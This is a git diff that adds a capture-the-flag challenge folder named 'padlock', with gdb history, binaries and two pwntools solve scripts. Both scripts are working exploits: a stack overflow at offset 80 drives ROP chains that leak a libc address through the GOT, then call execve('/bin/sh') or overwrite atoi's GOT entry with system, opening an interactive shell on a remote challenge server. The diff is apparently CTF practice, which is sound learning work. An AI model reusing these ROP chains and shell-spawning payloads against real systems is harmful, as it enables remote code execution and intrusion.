b/rop/05_padlock/.gdb_history new file mode 100644 index 0000000..b63977f --- /dev/null +++ b/rop/05_padlock/.gdb_history @@ -0,0 +1,44 @@ +disass main +disass vuln +r +disass win +vmmap +disass main +disass vuln +disass main +disass vuln +got +quit +got +r +got +b vuln +r +got +n +got +n +disass vuln +b *0x401282 +c +got +b main +r +got +r +got +find +find % +find x +search "%x" +search "[padlock]" +R +r +search "[padlock]" +got +search "[padlock]" +r +got +c +got +quit diff --git a/rop/05_padlock/ld-linux-x86-64.so.2 b/rop/05_padlock/ld-linux-x86-64.so.2 new file mode 100755 index 0000000..64b6146 Binary files /dev/null and b/rop/05_padlock/ld-linux-x86-64.so.2 differ diff --git a/rop/05_padlock/libc.so.6 b/rop/05_padlock/libc.so.6 new file mode 100644 index 0000000..c8b8655 Binary files /dev/null and b/rop/05_padlock/libc.so.6 differ diff --git a/rop/05_padlock/padlock b/rop/05_padlock/padlock new file mode 100755 index 0000000..53d251d Binary files /dev/null and b/rop/05_padlock/padlock differ diff --git a/rop/05_padlock/solve.py b/rop/05_padlock/solve.py new file mode 100644 index 0000000..da9bd8d --- /dev/null +++ b/rop/05_padlock/solve.py @@ -0,0 +1,68 @@ +from pwn import * + +OFF = 80 +context.binary = elf = ELF("./padlock", checksec=False) +# libc = ELF("/usr/lib/libc.so.6", checksec=False) +libc = ELF("./libc.so.6", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13582) +PRINTF_PLT = elf.plt["printf"] +ATOI_PLT = elf.plt["atoi"] +PRINTF_GOT = elf.got["printf"] +READ_GOT = elf.got["read"] +MAIN = elf.sym["main"] + +pop_rdi = 0x00000000004011FF # format string +pop_rsi = 0x0000000000401208 # got address +pop_rdx = 0x0000000000401211 +ret = 0x000000000040101A +mov_eax_pop_rbp = 0x4012B0 +mov_eax = 0x000000000040127D +# Mi serve scrivere binsh da qualche parte +# Mi serve trovare libc addr e chiamare system +rw_addr = 0x405000 +# search it in libc +BINSH = next(libc.search(b"/bin/sh\x00")) +format_addr = 0x402028 +print(p.recvuntil(b"[padlock] Decimal combination: ")) +payload = flat( + b"A" * OFF, + p64(ret), + # ATOI returns in rax, make it return 0 to set rax + p64(pop_rdi), + p64(format_addr), + p64(ATOI_PLT), + p64(pop_rdi), + # Since the GOT is a ptr I directly give it to printf to print the actual libc address + p64(PRINTF_GOT), + p64(ret), + p64(PRINTF_PLT), + p64(ret), + p64(MAIN), +) +p.send(payload) +print(p.recvline()) +# print(p.recvline()) +leaked = p.recvline().strip().split(b"[")[0] +leak_printf = u64(leaked.ljust(8, b"\x00")) +print(f"Leaked addr:{hex(leak_printf)}") +print(p.recvuntil(b"combination: ")) +libc.address = leak_printf - libc.symbols["printf"] + +BINSH = next(libc.search(b"/bin/sh\x00")) +payload2 = flat( + b"A" * OFF, + # p64(ret), + p64(pop_rdi), + p64(BINSH), + p64(pop_rsi), + p64(0), + p64(pop_rdx), + p64(0), + # p64(ret), + p64(libc.symbols["execve"]), +) +print(f"Binsh: {hex(BINSH)} System: {hex(libc.symbols['execve'])}") +p.sendline(payload2) +p.interactive() +# print(p.recvuntil(b"[padlock] Decimal combination: ")) diff --git a/rop/05_padlock/solve2.py b/rop/05_padlock/solve2.py new file mode 100644 index 0000000..0ce037c --- /dev/null +++ b/rop/05_padlock/solve2.py @@ -0,0 +1,44 @@ +from pwn import * + +OFF = 80 +context.binary = elf = ELF("./padlock", checksec=False) +libc = ELF("/usr/lib/libc.so.6", checksec=False) +libc = ELF("./libc.so.6", checksec=False) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13543) + +add_what = elf.sym["add_what_where"] +atoi_got = elf.got["atoi"] +main = elf.sym["main"] + +pop_rdi = 0x00000000004011FF # format string +pop_rsi = 0x0000000000401208 # got address +pop_rdx = 0x0000000000401211 +ret = 0x000000000040101A + +print(p.recvuntil(b"[padlock] Decimal combination: ")) + +# populate got table +first_run = flat( + b"A" * OFF, + p64(ret), + p64(main), +) +p.sendline(first_run) + +print(p.recvuntil(b"[padlock] Decimal combination: ")) +diff = libc.symbols["system"] - libc.symbols["atoi"] +payload = flat( + b"A" * OFF, + p64(ret), + p64(pop_rdi), + p64(atoi_got), + p64(pop_rsi), + p64(diff), + p64(add_what), + p64(ret), + p64(main), +) +p.sendline(payload) +p.sendline(b"/bin/sh") +p.interactive() diff --git a/rop/05_padlock/test b/rop/05_padlock/test new file mode 100755 index 0000000..79c68d5 Binary files /dev/null and b/rop/05_padlock/test differ diff --git a/rop/05_padlock/test.c b/rop/05_padlock/test.c new file mode 100644 index 0000000..1817c52 --- /dev/null +++ b/rop/05_padlock/test.c @@ -0,0 +1,7 @@ +#include + +int main(){ + int var1 = 5; + printf("Address: %d",&var1); + return 0; +}